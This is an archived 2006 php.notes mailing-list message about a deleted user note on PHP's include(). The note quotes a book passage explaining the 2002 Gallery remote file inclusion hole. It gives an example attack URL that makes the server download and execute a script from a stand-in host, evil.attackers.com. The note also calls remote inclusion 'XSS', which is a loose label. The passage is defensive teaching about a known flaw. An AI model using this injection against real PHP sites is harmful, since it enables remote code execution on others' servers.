note 49931 deleted from function.include by aidan

From: Date: Sat, 15 Apr 2006 16:36:27 +0000
Subject: note 49931 deleted from function.include by aidan
References: 1  Groups: php.notes 
Request: Send a blank email to php-notes+get-108168@lists.php.net to get a copy of this message
Note Submitter: dmhouse at gmail dot com ---- Adding to the statements made by durkboek A_T hotmail D_O_T com, remote includes allow for the possibilities of Cross-Site Scripting (XSS) attacks. Quoting from George Schlossnagle's 'Advanced PHP Programming': In late 2002 a widely publicized exploit was found in Gallery, photo album software written in PHP. Gallery used the configuration variable $GALLERY_BASEDIR, which was intended to allow users to change the default base directory for the software. The default behavior left the variable unset. Inside, the code include() statements all looked like this: require($GALLERY_BASEDIR . "init.php"); The result was that if the server was running with register_globals on (which was the default behavior in earlier versions of PHP), an attacker could make a request like this: http://gallery.example.com/view_photo.php? \ GALLERY_BASEDIR=http://evil.attackers.com/evilscript.php%3F This would cause the require to actually evaluate as the following: require("http://evil.attackers.com/evilscript.php ?init.php"); This would then download and execute the specified code from evil.attackers.com. [...] In his talk "One Year of PHP at Yahoo!" Michael Radwin suggested avoiding URL fopen() calls completely and instead using the curl extension that comes with PHP. This ensures than when you open a remote resource, you intended to open a remote resource.

« previous php.notes (#108168) next »